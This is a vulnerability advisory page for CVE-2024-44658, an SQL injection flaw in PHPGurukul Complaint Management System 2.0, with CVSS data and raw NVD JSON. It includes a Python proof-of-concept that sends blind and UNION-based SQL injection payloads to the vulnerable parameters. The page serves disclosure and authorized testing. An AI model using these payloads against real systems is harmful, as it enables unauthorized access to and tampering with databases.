Security Vulnerability Report
中文
CVE-2024-44658 CVSS 6.5 MEDIUM

CVE-2024-44658

Published: 2025-11-17 19:16:16
Last Modified: 2025-11-18 20:46:14

Description

PHPGurukul Complaint Management System 2.0 is vulnerable to SQL Injection via the subcategory and category parameters in subcategory.php.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:phpgurukul:complaint_management_system:2.0:*:*:*:-:*:*:* - VULNERABLE
PHPGurukul Complaint Management System 2.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2024-44658 SQL Injection PoC # Target: PHPGurukul Complaint Management System 2.0 # Endpoint: /subcategory.php # Vulnerable Parameter: subcategory, category import requests import sys target_url = "http://target-site.com/subcategory.php" # Boolean-based blind SQL injection payload payload = "' OR (SELECT COUNT(*) FROM users) > 0 --" params = { 'subcategory': payload, 'category': '1' } print(f"[*] Sending SQL injection payload to {target_url}") print(f"[*] Payload: {payload}") try: response = requests.get(target_url, params=params, timeout=10) if response.status_code == 200: print(f"[+] Request sent successfully") print(f"[+] Response length: {len(response.text)}") # Check for signs of successful injection if 'error' not in response.text.lower() or len(response.text) > 1000: print("[+] Potential vulnerability confirmed") else: print("[-] Injection may have failed") except requests.exceptions.RequestException as e: print(f"[-] Error: {e}") # UNION-based injection for data extraction union_payload = "' UNION SELECT 1,2,3,4,5,6,7,8 --" params_union = { 'subcategory': union_payload, 'category': '1' } print(f"\n[*] Testing UNION-based injection") try: response = requests.get(target_url, params=params_union, timeout=10) if response.status_code == 200: print(f"[+] UNION injection test completed") except requests.exceptions.RequestException as e: print(f"[-] Error: {e}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2024-44658", "sourceIdentifier": "[email protected]", "published": "2025-11-17T19:16:15.997", "lastModified": "2025-11-18T20:46:14.467", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "PHPGurukul Complaint Management System 2.0 is vulnerable to SQL Injection via the subcategory and category parameters in subcategory.php."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 2.5}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:phpgurukul:complaint_management_system:2.0:*:*:*:-:*:*:*", "matchCriteriaId": "8C6D9515-0DC3-4727-B5B5-2E6C34362BF7"}]}]}], "references": [{"url": "https://github.com/leexsoyoung/CVEs/blob/main/CVE-2024-44658.md", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://phpgurukul.com/complaint-management-sytem", "source": "[email protected]", "tags": ["Product"]}]}}